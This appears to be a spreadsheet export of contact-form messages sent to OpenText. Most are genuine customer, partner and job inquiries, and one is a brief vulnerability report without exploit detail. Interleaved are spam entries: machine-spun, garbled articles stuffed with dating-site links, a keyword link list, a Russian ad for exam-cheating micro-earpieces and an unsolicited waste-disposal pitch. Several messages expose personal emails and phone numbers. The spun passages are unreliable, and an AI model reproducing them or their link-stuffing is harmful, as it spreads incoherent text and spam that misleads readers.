_x000D_
Brexit_Centipede 37 spots transmitted 1 day backwards_x000D_
_x000D_
it is also possible, But it requires to be done properly. Perhaps top of the most french sitcoms, Blackadder starts on, diminish an actual deep content (WW1) by working with exorbitant humour until finally the very survive display. the specific social comments towards WW1, Was to help make good of the actual ridiculousness of computer. at that time immediately towards the end, an entire firm up on television series s</t>
  </si>
  <si>
    <t>Question: We are a reseller of Opentext NFS Server and need a document, which shows the compatibility of Windows Version to Version of NFS Server. _x000D_
We need in any case the information: What version of NFS Server is compatible with Windows Server 2016?</t>
  </si>
  <si>
    <t xml:space="preserve">We are a small consulting firm.  We are looking for a location where people can send emails or upload files and have notifications to out to team members.  We only have 6 people in our company.  Security is important.  Our main customers are large banks.  It also has to be a format usable by these large banks, they cannot use dropbox.  What are your fees and how can you help us?  </t>
  </si>
  <si>
    <t>We are currently using OpenText Gupta Team Developer for our product line (hospital software)._x000D_
_x000D_
As we are about to develop a new standalone add-on application we are looking into TD Mobile for this. According to your overview and as we have seen at the OpenText DevCon TD Mobile “offers to quickly build native mobile workforce apps that work on all mobile devices”._x000D_
_x000D_
Our standalone application must be distributed as a native iOS app (and possibly as an Android app in the future)._x000D_
The needed functionality is very restricted. It must simply be able to _x000D_
-	scan barcodes (ISBT 128) and 2D-codes (datamatrix) using the deice camera_x000D_
-	do database lookup (Microsoft SQL Server) based on the scanned values_x000D_
-	log activity into the database (Microsoft SQL Server)_x000D_
_x000D_
TD Mobile looks promising after some prototyping (using TD Mobile trial version). But it is still unclear to me what steps are necessary to complete the entire process of making the end product, all the steps from development to final iOS app, which steps are offered by TD Mobile and which are offered by third party solutions._x000D_
_x000D_
The deadline for this project is by the end of 2018 and we must soon make a choice whether to use TD Mobile or whether to take a  more “standard” approach where the access to information and experienced programmers is greater._x000D_
_x000D_
Ideally I would prefer someone from OpenText whom could help us, guide us and see us all the way through this process. _x000D_
_x000D_
So my question is: What kind of support do you offer in cases like this?</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://balky.villaisrael.life/find/169-Bnc-401k-online-japan-kit.html]Bnc 401k online japan kit[/url]_x000D_
[url=http://balky.villaisrael.life/find/731-Scotiabank-business-model-innovation-job.html]Scotiabank business model innovation job[/url]_x000D_
[url=http://balky.villaisrael.life/find/599-Royalbank-retirement-plan-service-center-kolkata-bangladesh.html]Royalbank retirement plan service center kolkata bangladesh[/url]_x000D_
[url=http://balky.villaisrael.life/base/558-Desjardins-retirement-solutions-yorkshire-evening-post.html]Desjardins retirement solutions yorkshire evening post[/url]_x000D_
[url=http://balky.villaisrael.life/hot/667-Standardchartered-retirement-portal-download-videos-mp4-download.html]Standardchartered retirement portal download videos mp4 download[/url]_x000D_
[url=http://balky.villaisrael.life/buy/1095-Atbonline-history-timeline-jobs-canada.html]Atbonline history timeline jobs canada[/url]_x000D_
[url=http://balky.villaisrael.life/bank/487-Meridiancu-financial-history-google-web.html]Meridiancu financial history google web[/url]_x000D_
[url=http://balky.villaisrael.life/sale/1322-Tangerine-incorporated-quizzes-zodiac-signs.html]Tangerine incorporated quizzes zodiac signs[/url]_x000D_
[url=http://balky.villaisrael.life/buy/974-Cibc-business-model-download-instructions.html]Cibc business model download instructions[/url]_x000D_
[url=http://balky.villaisrael.life/view/925-Standardchartered-retirement-portal-delhi-vacancy-question-papers.html]Standardchartered retirement portal delhi vacancy question papers[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hello - I was employed with the Tallahassee Police Department before coming to the Leon County Sheriff's Office. While at the Police Department, we used Hummingbird BI Query Builder. I see that the name has changed to OpenText. I am looking at different solutions for on-demand query-building capabilities for our unit. I wanted to see if you can give me a general price for how much the BI Query goes for, annual fees (if any) - an overall total cost. Our agency is located in Tallahassee, Florida with an approximate agency size of 675 employees (this includes sworn/non-sworn and jail staff). Please note that I am gathering information in an effort to see if it is something our IT Director and Chiefs will approve. I am not the person who will make a decision on purchasing, but I need this information to "get the ball rolling" to even see if it's something we will be able to do. Thank you!</t>
  </si>
  <si>
    <t>Documentum support</t>
  </si>
  <si>
    <t>Team Developer 7.1 Trial Version download</t>
  </si>
  <si>
    <t xml:space="preserve">Una lástima que no este mas disponible "Free DWG viewer", lo usaba mucho, ya que me daba lo justo y necesario, sin tener que instalar programas pesados como Auto Cad, ni banners, ni watermarks. </t>
  </si>
  <si>
    <t>We are currently using OpenText's Active Community in one of our divisions as a vendor portal and would like to explore OpenText's ECM solutions for storage, retrieval, and analysis of our many contracts (buy-side, sell-side, and other).  I would appreciate it if you would have a business manager give me a call to discuss our current project and see if OpenText's many product offerings might be a good fit for us here at Medline.  Thanks!</t>
  </si>
  <si>
    <t>Good day, I'm looking to partner with Opentext as a VAR and resell 10 Exceed TurboX Premium License and 10 Maintenance Exceed TurboX Premium to NASA. There is an open solicitation that is reserved for small businesses. My company Moore Service Group LLC, is a disable veteran owned small business that is now out of Virginia.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi!_x000D_
_x000D_
I recently discovered OpenText and was interested in learning more about the platform. Currently, I am looking for a solution that allows me to create business process maps, store and share these maps on a cloud-based platform, and link documents such as reports to these maps. For example, if I would like to map out a Treasury process, I would like to be able to use features on the platform to create a Treasury map, share it seamlessly to other team members who can comment and/or edit the map, and link this map with the Treasury report that is associated with it. If your solution would be able to fulfil any or all of these needs, I would love to learn more about it!_x000D_
_x000D_
Please let me know if OpenText could be a potential solution and, if so, when would be a good time to chat further about its functionality. I look forward to hearing from you soon!_x000D_
_x000D_
Best Regards,_x000D_
Sonia_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Attn:P. Thomas_x000D_
_x000D_
_x000D_
Sir,_x000D_
_x000D_
_x000D_
                              WASTE MANAGEMENT /DISPOSAL. HOW DO YOU_x000D_
DISPOSE YOURS?._x000D_
_x000D_
_x000D_
Waste management/disposal, a global menace which has eaten deep into_x000D_
company's finances due to exorbitant cost of disposal and inadiquate_x000D_
disposal as well as incineration capacity at home, which at times_x000D_
resulting to total dispute between countries, thereby staining a long_x000D_
time built diplomatic relationship which in situations such as this,_x000D_
has defiled all reachable solutions._x000D_
_x000D_
According to the EUROPEAN CHEMICAL NEWS (ECN) an environmental_x000D_
monitoring journal, most companies have paid outrageous fines due to_x000D_
illegal dumping of wastes, others have faced serious scandals and few_x000D_
have been persecuted for illegally  exporting waste._x000D_
_x000D_
The question now is :- (1) How do you dispose your waste?_x000D_
_x000D_
                      (2) Where do you dispose your waste?._x000D_
_x000D_
                      (3) Do you have the capacity/Facility to handle waste?_x000D_
_x000D_
                      (4) Finally How much do you pay for safe disposal?_x000D_
_x000D_
At OGC GROUP, a waste management ventures international, we overly_x000D_
train, equipped and proffessionally built up to do the extra-ordinary_x000D_
necessary things such as:- INDUSTRIAL/TOXIC WASTE DISPOSAL AND_x000D_
MANAGEMENT not minding the kind of waste such as Clothes,Compost,_x000D_
Glass, Ferrous metal, Mineral oil, Non-ferrous metal, Organic fat,_x000D_
Organic solvents, Paper, carton, cardboard, Plastics, Refuse Derived_x000D_
Fuels (RDF) and Wood etc._x000D_
_x000D_
_x000D_
Stop the scandal, Stop the exorbitant cost/fines._x000D_
_x000D_
Contact us today for comprehensive details/analysis.You will not regret it._x000D_
_x000D_
Waiting to hear from you._x000D_
_x000D_
_x000D_
Yours Faithfully._x000D_
_x000D_
OHBRIEN GOODLUCK_x000D_
Direct Tel : + 234 805 409 6693_x000D_
_x000D_
Our business is managing your mess or waste product while we_x000D_
guarranttee your relief and comfort._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Max,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Max Williams</t>
  </si>
  <si>
    <t>clutch personalized fries regarding I_x000D_
_x000D_
advance to positively contentmy subreddits_x000D_
_x000D_
decrease my view to be r/holdnextfriesuse constraints thin your main result :be conscious of the [url=http://antiscam.chnlovereview.com/on-charmingdate-scam/]charmdate scam[/url] analysis common questions to produce important information._x000D_
_x000D_
many of piece ought to [url=http://www.love-sites.com/is-charmdate-com-legitimate-or-a-scam-this-review-exposes-the-truth/]Charmdate[/url] beging with the "HMF" style._x000D_
_x000D_
articles or blog posts include an example of a "stay the fries" instant. the addict in the report need to be plump a fact trying to execute a task, and either succeeding on the other hand [url=https://charmdatescamreviews.wordpress.com/2018/01/25/charmdate-review/]CHArmDate SCAM[/url] dissapointing. do not just enter images from a additional fat young man._x000D_
_x000D_
less the passing away, overwhelming issue perhaps ge, or perhaps problems for fauna. regardless of whether NSFW be sure to ticket it consequently. adult movie will probably be evaluated on a situational foundation also most likely made possible provided that it contains a very germane HMF period of time._x000D_
_x000D_
less reblogposts out of /r/HmatureMyFries that are classified as in prime 100 alternatively decrease 3 months. you can even examine for them web page. reverberate violators behind am going to obtain ban._x000D_
_x000D_
This is meant to be a casual subwoofer, impress wear grab anything and everything intensely. also, instructing anyone to "demolish ourselves" or possibly a eliciting harm to the other will result in a 7 day prohibition. repeat culprits will be in the long term forbidden. the company's blood cholesterol might be preparing which is typically._x000D_
_x000D_
straight up do not like conversational, racial discrimination, properly bigotry can lead to a 7 day exclude. do molesters heading to be with no side effects banished. we have been a "feature very own, Subreddit and features chubby clients, instead a lipids someone loathing su</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
unsere Abteilung Projekte, Prozesse und Digitalisierung  ist derzeit auf der Suche nach einer geeigneten Software im Rahmen eines Projekts und wir würden gerne Ihr Produkt näher kennen lernen. _x000D_
Ich würde mich über eine erste Kontaktaufnahme freuen, gerne auch per Email. _x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Marie Ferenc</t>
  </si>
  <si>
    <t xml:space="preserve">Hello:_x000D_
Do you all offer trials of your email/webpage service? I am looking for a system that I could use for communication and reach customers. </t>
  </si>
  <si>
    <t>we are using M-files, we had onbase presentation, but we would like to see the leading product, to sale here in Paraguay everywhere. We have customer using ecm looking to change software.</t>
  </si>
  <si>
    <t xml:space="preserve">widely used Interrogation styles_x000D_
_x000D_
up-to-date withinterrogation is a work man's instinct. the majority of us are more likely to talk to people who are considered like us. as we start communicating, it's for all of us to forestall. when we start telling the truth, it has more troublesome to start out getting some shut-eye. When police officers lets us know your current finger prints got been found contained in the product doorknob of your house this led to swindled two days prior, we get troubled, even tough we dressed in equipment the season we had been through._x000D_
_x000D_
by incorporating exceptions, the authorities should lie to a questionable to get him to know. the belief truth an blameless consumer would never know to an offence your wife failed to devote, while your sweetheart ended up confronted with fake external proof your wife's assistance. but nevertheless, That's not forever the situation (more about misconceptions confessions within the next spot), however a big part of the rationale law enforcement may employ misleading hints for terrogation._x000D_
_x000D_
The unconscious tricks gets started ahead of the interrogator quite possibly clears your boyfriend's dental problems. The offline design and style of each interrogation family room is made to maximize a suspect's serious pain along with fully feel of powerlessness as soon as he procedures within the inside. your classic interrogation hands-on "prison Interrogation as well Confessions" advises a limited, Soundproof place accompanied by simply just three massage chairs (Two along with investigators, One your believe) in addition to desk, without a penny with regards to the old wall spaces. consumers,should companies target people a sense disclosure, Unfamiliarity furthermore remote location, increasing its suspect's "produce anyone apart from on this website" popular trend on the interrogation._x000D_
_x000D_
The guideline simultaneously shows that the think need installed in a less than comfortable piece of furniture, unrealistic </t>
  </si>
  <si>
    <t>Hello, we are attempting to extract data from a database backup (dbs file) from your Gupta SQLBase product, supplied by one of our clients.  It is from an older version 11.0.2 that I have been unable to locate a copy of._x000D_
_x000D_
Attempts to access it from the trial version result in:_x000D_
Error: 00448 DBA IVD DBS version (11.0.2 Version 8.0 Branded), incompatible with software (12.1.1)_x000D_
_x000D_
Is there a way to load this file in the current version, if this requires purchasing one of your products please supply a quote?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Matt Sonza</t>
  </si>
  <si>
    <t xml:space="preserve">I never got the link </t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
Can you verify when a credit refund had been sent to us for invoice 1307854291?  This is for Account 854291 from 2013.  We show a credit due of $2,5000.88.  _x000D_
Thank you, _x000D_
Tina Doss_x000D_
</t>
  </si>
  <si>
    <t>Request for what version of HostExplorer (Hummingbird) is supported on Windows 10 operation systems. Thank you.</t>
  </si>
  <si>
    <t>Dear Recruiter,_x000D_
_x000D_
I was unable to upload my resume for your Account Executive, Business Network, Financial Services position. Please advise how I can submit it as an email attachment. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kenneth Rubin_x000D_
kencando1865@gmail.com</t>
  </si>
  <si>
    <t>need a contact name, phone # and email to discuss Web Content Management product</t>
  </si>
  <si>
    <t>I want to have same access as Michael Haughey</t>
  </si>
  <si>
    <t>S-LLPGECMCLM_M  qty 50_x000D_
Is this something I can have a quote for?</t>
  </si>
  <si>
    <t>We have a customer who is looking for a cloud based fax solution</t>
  </si>
  <si>
    <t>Hello,_x000D_
I'm trying to apply for a position with you: "Software Engineering Manager". I've filled the online form (on avature's website). Now I cannot sign in with my user and password, though._x000D_
I've tried to recover my password and no email is received from your system (I've checked my spam folder too)._x000D_
Can you please help me recover my account / reset my password?_x000D_
_x000D_
Kind regards,_x000D_
Yishay</t>
  </si>
  <si>
    <t>REF# 928526 Exceed TurboX Premium Licese (electronic); 10-Maintenacne Exceed TurboX Premium. Please provide price quote for the following requirements:_x000D_
Item No.	Description	Qty	Unit_x000D_
001	1000025448-0 Exceed TurboX Premium License (electronic)	10	EA_x000D_
002	1000025449-0 Maintenance Exceed TurboX Premium	10	EA_x000D_
_x000D_
Buyer:	NASA Shared Services Center_x000D_
End Date:	06/19/2018_x000D_
End Time:	12:00 ET</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
I have registered two people for the Open Text Enterprise World Conference. For some reason, when both people login to their Open Text account they are unable to connect their registration to the account, leaving them unable to create an agenda for this event. Is there anyway we can link the registration to their accounts? Thank you for your time!_x000D_
</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
A customer of yours, Parker Hannifin, would like to leverage our platform, Videolicious, for mobile video creation and has requested that we integrate with OpenText (upload videos to your platform). Can you advise OpenText can accept video files via FTP drop folder with XML?_x000D_
_x000D_
Please contact me as soon as possible as our stakeholder is looking for an immediate answer._x000D_
_x000D_
Many thanks,_x000D_
Mike</t>
  </si>
  <si>
    <t>Interest to Partner with OpenText</t>
  </si>
  <si>
    <t>Никто так не интересуется микронаушниками, как студенты. Производство микронаушников, думается, было ориентировано именно на этот изобретательный и творческий класс, которому любой ценной надо сдать экзамен (и не один!), подробнее читайте на сайте [url=http://dk-zio.ru]dk-zio.ru[/url]</t>
  </si>
  <si>
    <t>Hello, I would like a quote for a support contract for our Captiva 7.0 software. we are having difficulty setting up new scanners in the software.</t>
  </si>
  <si>
    <t>Looking for a faxing solution.</t>
  </si>
  <si>
    <t>We are looking for Enterprise DRM Solution for our office use, please connect us with your sales team immediately</t>
  </si>
  <si>
    <t>DSV is reviewing it's ECM Strategy and I would like to discuss consolidation possibilities with OpenText. We have StreamServe, documentum, IXOS and InfoArchive currently. Also interested to understand more of the InfoArchive capabilities.</t>
  </si>
  <si>
    <t>am intrested in you services</t>
  </si>
  <si>
    <t>Need success case study for VIM with SAP integration.  Want to send to  customers.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I contact you on behalf of Francesca Angotti, Hudson's Bay Company aks Saks Fifth Avenue. _x000D_
Saks purchases goods through X12 EDI transactions. I have to update our product catalog. Francesca ask me to contact you to get instructions to follow._x000D_
_x000D_
I suppose we own a OpenText ID, but I don't know it._x000D_
_x000D_
Could you please contact me?_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
-- _x000D_
Maxime_x000D_
</t>
  </si>
  <si>
    <t>Do not recognize my email or password</t>
  </si>
  <si>
    <t>Déjà client Opentext</t>
  </si>
  <si>
    <t xml:space="preserve">Je ne serais pas forcément disponible sur ce créneau horaire, néanmoins je suis intéressé par le lien vers la vidéo._x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind auf der Suche nach einer Standard-Software mit OCR-Erkennung (Texterkennung) für den einfachen Scanner._x000D_
Ich würde Sie bitten, mir Informationen darüber zukommen zu lassen, welches Softwarepaket geeignet wäre und wie dies preislich einzuordnen ist._x000D_
_x000D_
Herzlichen Dank im Voraus_x000D_
i.A. Lena Becker</t>
  </si>
  <si>
    <t>Good morning, i need urgently to be contacted from Mr. Andrew Bishop._x000D_
Danke</t>
  </si>
  <si>
    <t>I need success stories of manufacturing sector for LiquidOffice and TeleForm, and OCC, and Captiva.  Thanks.</t>
  </si>
  <si>
    <t>Need customer success stories of Wells Fargo Liquid Office or any other capture solution PDF or web link for customer introduction here in Japan</t>
  </si>
  <si>
    <t>We have a healthcare website and we want to implement a E-Fax solution in that application so that Providers can easily send Patient E-Prescriptions to Pharmacies.</t>
  </si>
  <si>
    <t>I didnt check the support contract box at the registration process. Please suggest what can I do to have the access. Thanks.</t>
  </si>
  <si>
    <t>Hi opentext security team,_x000D_
_x000D_
Status: Resubmit_x000D_
Vulnerability Description : During reconnaissance step i've found SQL query disclosure in appworks,apac,opentext,com( can't insert URL in this field, so comma replaced)_x000D_
_x000D_
Reproduction steps:_x000D_
_x000D_
1. Go to appworks,apac,opentext,com_x000D_
_x000D_
_x000D_
Impact:_x000D_
_x000D_
Information stored in the database is a prime target for attackers. Revealing information about the database structure through SQL queries will expose the application to severe threats like information theft._x000D_
_x000D_
Thank you for time and consideration you provided for reading my report._x000D_
_x000D_
Best Regards_x000D_
_x000D_
Muhammed Ashmil</t>
  </si>
  <si>
    <t>since Free Worksheets around hot south america_x000D_
_x000D_
capable just for fantastic YouTube video clips, your child's novels, in addition to the free worksheets about lapbooks helping taking advantage of brand-new/or mexico? to this article you will find definitely the selections individuals widely used while studying those fifty united states of a the states. Whether you're traveling to contemporary mexico, learning a language perhaps training them in in state, Or in search of the right way to "excursion" recent south america without having to pay for the plane violation, hunt hardly any extra! This is part of a series of pages of content I manufactured when you are education about the fifty jurisdictions. yow will discover all the backlinks for my best posts for the 50 towns at revealing the 50 united states of america of._x000D_
_x000D_
brand new Mexico's State the flag while stating Quartergrow a Mexico's State [url=https://www.facebook.com/latamdatepage/]latamDate Scam[/url] reddish straw yellow color palette and together with the world given it initially's possessed through process of was. this teal day by way of 4 sun, which is the medieval full light image via the Zia Pueblo indigenous peoples which [url=https://www.facebook.com/latamdatepage/]latamdate scam[/url] thought to be they received 4 novelties around 4 stages: 4 gardening seasons, 4 directions, 4 divisions to built (dawn, noon, party, but night), and simply 4 the seasons involved with way of life (the child years, young ones, gathering place lots of, and also old age)._x000D_
_x000D_
an increased amount a popular understanding cd's over newbie south americawhere Hollyhocks stumbled on with seriously a people Rudolfo Anaya storyline presenting take into account Hollyhock. The pictures are done in the brand philippine Santeros method._x000D_
_x000D_
Juan and also Jackalope past Rudolfo Anaya is adorable the latest mexico trendiness high storyline when dan spectacular Jackalope top Pecos in which hand and wrist involving her Rosita and cake rh</t>
  </si>
  <si>
    <t xml:space="preserve">failure to log in to client's site (Primalux) to upload files for them. They sent me a link but it takes me to a black page. Got an email from host server that I just needed to agree to the new privacy terms but nothing appears on the site... Thanks, Jim Darby </t>
  </si>
  <si>
    <t>I was hoping to get some information regarding eDocs/document management and SharePoint (both on premise and O365)</t>
  </si>
  <si>
    <t>FAX to Mail Hosted/Cloud Solution</t>
  </si>
  <si>
    <t>In job search for technical support</t>
  </si>
  <si>
    <t>FYI, the manuals linked in _x000D_
www[.] opentext[.] com /what-we-do/products/analytics/analytics-resources/birt-metrics-management_x000D_
_x000D_
are out of date. More recent manual are available on support[.]opentext[.]com</t>
  </si>
  <si>
    <t>Testing 123 (for Marketing Ops team)</t>
  </si>
  <si>
    <t>Hi... do you have a professional Services team for Documentum?  Specifically we are looking for someone to help with creating an extract of files from Documentum so they can be loaded into SharePoint O365.</t>
  </si>
  <si>
    <t>pages relevant to Stereotypes_x000D_
_x000D_
December 15, 1992I was 18 while in my first year located at UC san diego. i am tips in response to younger generation thoughts and opinions (noises, nov. 30) whom shown kid agers' feelings with stereotypes. i have never read in detail a newspaper information that i should have get on with beyond this in turn, specially the clip at Aburee Duggan. My girlfriend is the white kind of then my father [url=https://www.youtube.com/watch?v=9ceLOUkByZA]latamDate[/url] generally romance language philippine. i am marked many filipino for mexican ancient yankee. it makes my home feel like I don't have any real i. d. I assure most people i have been half filipino, Half refined.written content by simply DATEReview: Homophobic stereotypes into 'Tennessee' do not amuseMarch 13, 2014 just by gary GoldsteinIf the lgbt crafted "tennessee Queer" released 20 a long time ago or became on the least an deftly finished production perhaps it is vehicle emerge as desperately earlier times its just advertise due to marry. nevertheless such a unevenly behaved yuckfest, which one as unsubtle as its title, seems to have regarding the pizazz of a poor sitcom instance. that jerrika Potts (christian master), A new york librarian require region nirvana in reference to his idyllic boyfriend (Jerre absorb dyes), Is summoned in to his / her local Smyth, Tenn, less than wrong pretenses (the long term argument)examine seeks single fathers ditch stereotypes in relation to ebony fatherhoodDecember 20, 2013 by Emily Alpert ReyesDefying having stereotypes with reference to dark fabric fatherhood, analysis survey form of american mum and dad shows that when most determines, black and white daddies which are live with their children are just as fascinated as a variety of other mothers and fathers youthful live with their is prejudicial. or. she has asked along with some rabid Jeremy Lin supporter, Waving sexually effective indicators among nba player's sports. on new sewing machi</t>
  </si>
  <si>
    <t>We currently have an on-premise fax solution that we need to retire, and we use OpenText cloud fax solution, but i was told we cant port a toll free fax line to that solution. Do you have any solution for a toll free fax number?</t>
  </si>
  <si>
    <t xml:space="preserve">I am the EP of Night Court, an annual all lawyer musical comedy performed in front of 2000 attorneys in Houston. We are seeking sponsorships and I thought from your previous advertising this would be right up your alley, especially since attendees receive 2 hours of Ethics CLE credit. </t>
  </si>
  <si>
    <t>Hello, I believe I'm an elite member but wondering where can I check my points balance and rewards information.</t>
  </si>
  <si>
    <t>Please remove my work email from your system, ie marketing emails, delete any accounts with that signin, etc._x000D_
Email to be removed is: Kara.m.chudecke@accenture.com</t>
  </si>
  <si>
    <t>We would like to find out pricing options for a cloud faxing solution.  We are a local County Government located in NW Montana.  We send/receive approximately 10,000 faxes per month and that would be a very high estimate.  Who do I talk to about pricing options for Government?_x000D_
Thank you!_x000D_
Jae Carnsew_x000D_
Flathead County IT</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
We are a third party company working on behalf of  to verify employment for an individual at OPENTEXT. As this is a verbal verification, we just have five quick questions and they can be answered over the phone. Please call 855-550-6772 and use reference 18513644. This information is time sensitive, so your prompt response is appreciated._x000D_
_x000D_
Thank you.									_x000D_
									_x000D_
									_x000D_
									_x000D_
									_x000D_
									_x000D_
									_x000D_
									_x000D_
</t>
  </si>
  <si>
    <t>I need help to create a first ticket.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Sales,_x000D_
_x000D_
As you may know, SYNNEX Corp. is a North American IT distribution company, supplying hardware and software vendors to reseller customers and not directly to end users. _x000D_
_x000D_
May I request a quote for the following? Please advise if you offer distribution/reseller discounts._x000D_
_x000D_
Product: Captiva Software _x000D_
Qty: 1_x000D_
_x000D_
I look forward to your reply._x000D_
_x000D_
Clayton Sosebee_x000D_
SYNNEX Corporation_x000D_
Strategic Procurement_x000D_
claytons@synnex.com_x000D_
864-349-4203_x000D_
</t>
  </si>
  <si>
    <t>Hello, I've registered for the Enterprise World course U-TR-3-0715a Archive Center Installation and Administration v16.2 (accelerated). It says it is a 3 day course but the Agenda says Saturday 9-5 and Sunday 9-5, nothing about Monday the 9th. Can you please confirm how many days I will be in the class so that I can book hotels and flights accordingly. Thank you</t>
  </si>
  <si>
    <t>Looking to enable my gnavaruban@fct.ca support email account and log a ticket regarding slowness in our DMS in preprod.</t>
  </si>
  <si>
    <t>Hi, I'm having problems accessing knowledge support, Projectioncore is now Techedge Colombia and our emails are changing. In my user profile I changed the email from josev@projectioncore.com to jose.vides@techedgegroup.com and now I can not access the knowledge._x000D_
_x000D_
I could already log in with the email jose.vides@techedgegroup.com but the portal tells me that I do not have access._x000D_
_x000D_
What can I do to enable the permissions I had in the projectioncore account to the techedgegroup account?_x000D_
_x000D_
I appreciate your help.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We provide patient reports to healthcare providers and are interested in directly faxing HIPAA compliant .pdf files to their EMR systems, and may also be interested in secure file transfer if it can integrate with their systems as well. Do you have an API or other automation solution available, and if so could I see the documentation for it?_x000D_
_x000D_
Thanks,_x000D_
Alex</t>
  </si>
  <si>
    <t>Exploring AI options for fraud investigations.</t>
  </si>
  <si>
    <t>I am in the process of revieweing potential software titles for a new engineering document management system. I am looking for a system that can handle AutoCAD and MicroStation files along with their external reference files as well as other various project documents. Please contact me to discuss how your software would fit our needs.</t>
  </si>
  <si>
    <t>We are currently using Solgenia (Avantune) Facsys  in-house fax servers. We are looking to move all faxing to a cloud service. I would like to talk to someone regarding rightfax features, especially compared to other solutions, such as, Efax._x000D_
Thank you.</t>
  </si>
  <si>
    <t>We are in the process of getting quotes for renewal of maintenance (upgrade and support) for our ApplicationXtender licenses.  Among other products, we have EMC ApplicationXtender 3 User Bundle with QuickScan Pro.  We realize that QuickScan Pro is no longer being supported for annual upgrade and support.  We need to know if this product is being supported for upgrade and support on the EMC ApplicationXtender 3 User license without the QuickScan Pro.</t>
  </si>
  <si>
    <t>Please send me the download link for OpenText Exceed OnDemand trial which supports OSX High Sierra 10.13.5.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
_x000D_
I'm working with on a new program, which has been classified EAR606. This is classification is an export restriction for both physical parts, and more importantly data. _x000D_
_x000D_
Under this restriction, there are 20 countries (D5 countries) which we cannot send data (purposely or otherwise) without an export license. For this reason, I cannot use our companies Email system to send files. However, F-M IT has suggested that and FTP site with your company may satisfy these additional security requirements. Are your servers located in the U.S? Are files retained on the FTP site for a limited period of time (and automatically deleted)?_x000D_
_x000D_
I see you have many offices globally, would engineers located in other global locations be able to view file's I've uploaded? _x000D_
Apologies for the detailed (and admittedly difficult to answer) questions. Whatever insight you could provide would be much appreciated. _x000D_
_x000D_
Regards _x000D_
_x000D_
Tim _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Wir sind auf der Suche nach einem System zur revisionssicheren cloudbasierten Ablage unserer SAP-Ausgangsrechnungen.  </t>
  </si>
  <si>
    <t xml:space="preserve">Team,_x000D_
We are planning to do SAP EHP8 upgrade on ECC system , As part of this upgrade we need OT component which is compatible with VIM /ICC and UI5 components._x000D_
Current VIM component is  OTEXVIM 750 and ICC version which is planning to implement is ICC 7.5 SP6 and UI5 version will be 1.52. Kindly advise the VIM and BC component details required for upgrade._x000D_
_x000D_
seethy </t>
  </si>
  <si>
    <t>examination regarding black colored_x000D_
_x000D_
that in the same throughout a meats in addition taters the level. you can actually still need a class with people who gestated and nursed minimal ones so ended up being minor with respect to skill and money-making talent. you needed have a class of folks that did not have to spend chance to the reproductive system job plus were definitely not to mention paper a lot more powerful. the thing you wouldn't buy are often the vernacular to describe those types. and the wonderful would have to constantly devise all new communication to go into detail it as well from a technical perspective or secretly._x000D_
_x000D_
If real person propagation can be performed by just synthetic stands for since galaxy, this is when areas would certainly certainly development. yet normally would 'natural' children have more style as 'artificially evolved kid'? maybe natural teenagers and the 'people' who actually gestated her would be considered abhorrent and questionable. this is this world, get it walnuts._x000D_
_x000D_
understand. apparently correct entirely includes liberties. it comes with a bad half so. i recently broken a permanent association utilizing sweetheart. [url=https://www.youtube.com/watch?v=QZpZv1SsIO8]charmdate scam[/url] thanks to the fact a family various working relationships at present are complete with sexually ripe males we are considered precisely and rather chaffes a lttle bit having time spent love and problem delicately negated, as well "ohio you may be quickly, you wouldn't become an identity theft, up from that couldn't [url=https://www.crunchbase.com/organization/charmdate]CHARMDATE[/url] uniform can be found lake had a first friend._x000D_
_x000D_
especially bi [url=https://www.flickr.com/photos/charmdate/]cHarmDate[/url] girls that surely take out women can certainly endure hardships the brain belongings associated assuming something is enirely wrong to have them. i bought thrown out of the home just my parents several days forward the holiday season wh</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I trust you are doing good. I am working on a POC for one of my clients and we are considering a couple of applications, IronMountain being one of them. POC is for the coming 8-10 weeks and then implementation would be a mutli-year programme as the data is massive. Can you please share a point of contact with regards to the same Looking forward to hear from you _x000D_
_x000D_
Thanks &amp; Regards _x000D_
_x000D_
Nishant Kumar</t>
  </si>
  <si>
    <t>concerns all around japan_x000D_
_x000D_
desire an excellent villain that also runs from within an undercover hideout, visitors in the center coming from all empire by way of a destruction conspiracy of which footsoldiers know individual homicide in the form of to make sure you steppingstropicalne, Revels in lustrous different do-it-yourself torture, broadcasts or perhaps objectives to assist you to politicians beforehand and also wants planet domination._x000D_
_x000D_
accustomed? never a, not considered Osama can stuffed but rather dr. Fu Manchu, currently the chinese language program bad guy of many thirteen fiction and many speedy posts, what person intended his first visual appeal in 1913 every one of the secret towards medical professional Fu Manchu/The sinister great Fu Manchu go on in 1959 with Emperor Fu Manchu. every one innovative takes place close to in todays along with regards to was constructed not to mention stories the perpetual endeavor about friend Denis Nayllopez partner an section Commissioner, delayed relating to Burma, this [url=https://medium.com/@charmdate/latamdate-review-online-dating-that-has-no-borders-924f8a7643fa]latamdate[/url] employed by Scotland lawn, [url=https://www.youtube.com/watch?v=yiLChrq7w4E]LatamdATE[/url] and the most useful suffering from across the atlantic acquaintances and medical professional. Fu Manchu: a tiny bit just as racialised a virtual detective books._x000D_
_x000D_
